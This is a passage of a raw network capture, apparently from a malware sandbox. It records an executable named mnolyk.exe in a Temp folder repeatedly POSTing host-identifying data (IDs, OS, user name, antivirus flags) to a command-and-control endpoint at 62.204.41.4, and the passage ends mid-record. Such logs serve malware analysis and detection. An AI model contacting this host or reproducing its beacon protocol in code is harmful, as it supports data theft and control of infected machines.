                                                        Feb 6, 2023 14:19:01.259062052 CET | 694 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:01.322190046 CET | 695 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        495 | 192.168.2.5 | 50185 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:01.492595911 CET | 695 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:01.556504965 CET | 696 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        496 | 192.168.2.5 | 50186 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:01.729093075 CET | 696 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:01.793245077 CET | 697 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        497 | 192.168.2.5 | 50187 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:01.971976042 CET | 697 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:02.037403107 CET | 698 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        498 | 192.168.2.5 | 50188 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:02.215107918 CET | 698 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:02.280091047 CET | 699 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        499 | 192.168.2.5 | 50189 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:02.451596022 CET | 699 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:02.517589092 CET | 700 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        5 | 192.168.2.5 | 49695 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:29.833365917 CET | 205 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:29.896542072 CET | 206 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        50 | 192.168.2.5 | 49740 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:53.015336037 CET | 251 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:53.081063986 CET | 251 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        500 | 192.168.2.5 | 50190 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:02.698642015 CET | 700 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:02.763273954 CET | 701 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        501 | 192.168.2.5 | 50191 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:02.948024988 CET | 701 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.012465954 CET | 702 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        502 | 192.168.2.5 | 50192 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:03.186395884 CET | 702 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.250641108 CET | 703 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        503 | 192.168.2.5 | 50193 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:03.417591095 CET | 703 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.482860088 CET | 704 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        504 | 192.168.2.5 | 50194 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:03.649008036 CET | 704 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.710764885 CET | 705 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        505 | 192.168.2.5 | 50195 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:03.888103962 CET | 705 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.951908112 CET | 706 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        506 | 192.168.2.5 | 50196 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:04.123384953 CET | 706 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:04.188596964 CET | 707 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        507 | 192.168.2.5 | 50197 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:04.369822979 CET | 707 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:04.433660030 CET | 708 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        508 | 192.168.2.5 | 50198 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:04.619859934 CET | 708 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:04.683567047 CET | 709 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        509 | 192.168.2.5 | 50199 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:04.853143930 CET | 709 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:04.915909052 CET | 710 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        51 | 192.168.2.5 | 49741 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:53.261441946 CET | 252 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:53.329667091 CET | 252 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        510 | 192.168.2.5 | 50200 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:05.093128920 CET | 710 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
